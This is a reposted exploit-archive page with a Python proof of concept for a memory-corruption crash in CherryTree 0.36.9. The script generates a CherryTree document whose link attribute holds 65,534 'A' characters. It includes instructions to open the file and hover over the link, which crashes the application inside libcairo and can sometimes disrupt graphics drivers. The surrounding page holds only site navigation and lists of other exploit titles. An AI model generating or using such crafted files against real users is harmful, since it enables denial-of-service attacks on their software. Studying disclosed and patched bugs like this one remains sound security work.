首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CherryTree 0.36.9 - Memory Corruption (PoC)
来源:vfocus.net 作者:n30m1nd 发布时间:2016-10-28  
#!/usr/bin/python
 
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###
 
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.giuspen.com/cherrytree/
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe
# Version: Affects all versions of CherryTree prior to 0.37.6
# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Run this python script. It will generate a "PoC-1.ctd" file.
# * Open the file and hover over the link.
# Bonus
# =====
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
 
# Why?
# ====
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
# trying to draw the contents of the graphical bitmaps.
 
# Exploit code
# ============
 
crashfile = '''<?xml version="1.0" ?>
<cherrytree>
    <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
        <rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
    </node>
</cherrytree>
'''
 
with open("PoC-1.ctd", 'w') as f:
    f.write(crashfile)
    f.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·uSQLite 1.0.0 - Denial Of Serv
·Baby FTP server 1.24 - Denial
·GNU GTypist 2.9.5-2 - Local Bu
·PDF Complete Office Edition 4.
·Komfy Switch with Camera DKZ-2
·NO-IP DUC v4.1.1 Unquoted Serv
·SmallFTPd 1.0.3 - 'mkd' Comman
·Bassmaster Batch Arbitrary Jav
·WSearch service (windows) - pe
·Angelo Emlak Scripti 1.0 Datab
·Network Scanner 4.0.0 - SEH Lo
·ASP Gateway 1.0.0 Database Dis
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved